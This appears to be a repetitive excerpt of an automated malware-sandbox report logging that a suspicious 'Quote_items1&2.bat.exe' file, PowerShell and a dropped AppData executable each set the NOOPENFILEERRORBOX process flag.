                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess information set: NOOPENFILEERRORBOX
